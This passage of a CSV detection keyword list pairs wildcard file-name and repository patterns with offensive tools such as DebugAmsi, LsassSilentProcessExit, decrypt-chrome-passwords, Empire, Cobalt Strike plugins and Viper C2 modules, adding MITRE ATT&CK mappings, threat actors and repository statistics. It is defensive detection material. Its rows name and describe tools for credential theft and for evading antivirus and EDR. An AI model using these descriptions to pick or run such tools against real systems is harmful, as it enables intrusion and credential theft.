mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsi-main*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsix64.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*DebugAmsix86.exe*","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","71","17","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" +"*debugfs /dev/*","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugdfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*decoder-it/LocalPotato*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*Decode-RoutingPacket*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decoy_document.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*decrypt.py .\*.txt utf-16-le*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","0","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*decrypt_chrome_password.py*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" +"*Decrypt-Bytes*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1056","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*decrypt-chrome-passwords-main*","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","10","7","673","147","2023-10-02T18:22:13Z","2020-12-28T15:11:12Z" +"*Decrypt-CipherText*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*DecryptNextCharacterWinSCP*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*decryptteamviewer*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*DecryptWinSCPPassword*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*DeEpinGh0st/Erebus*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*deepinstinct/ContainYourself*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z"
+"*deepinstinct/LsassSilentProcessExit*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z"
+"*deepinstinct/NoFilter*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. 
It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z"
+"*deepsound2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*deepzec*","offensive_tool_keyword","Github Username","Github Author of malicious scripts and eploitaiton tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/deepzec","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*defanger exclusion*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*defanger realtime*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*defanger signature*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z"
+"*default_userpass_for_services_unhash*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*default_users_for_services_unhash.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*DefaultBeaconApi*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
+"*DefaultCreds-cheat-sheet*","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","10","4666","610","2023-07-15T22:16:49Z","2021-01-01T19:02:36Z"
+"*--defaults-torrc*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","0","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z"
+"*DefenderCheck*","offensive_tool_keyword","DefenderCheck","Quick tool to help make evasion work a little bit easier.Takes a binary as input and splits it until it pinpoints that exact byte that Microsoft Defender will flag on. and then prints those offending bytes to the screen. This can be helpful when trying to identify the specific bad pieces of code in your tool/payload.","T1027 - T1055 - T1562 - T1553","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/matterpreter/DefenderCheck","1","0","N/A","N/A","10","1919","340","2023-09-14T18:42:39Z","2019-04-09T14:03:46Z"
+"*DefenderCheck.exe*","offensive_tool_keyword","DefenderCheck","Identifies the bytes that Microsoft Defender flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","1","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z"
+"*DefenseEvasion_CodeSigning_PeSigningAuthHijack.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - 
T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_CodeSigning_StolenMircosoftWindowsSignature.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_CobaltStrikeOnline.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_CsharpAssemblyLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - 
T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_CsharpAssemblyLoaderPlus.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_ExampleModule.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_PeLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_PowershellRunInMem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_ProcessHandle.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_PythonRunInMem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_SessionClone.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_ShellcodeLoader.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*DefenseEvasion_ProcessInjection_WindowsSystem.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
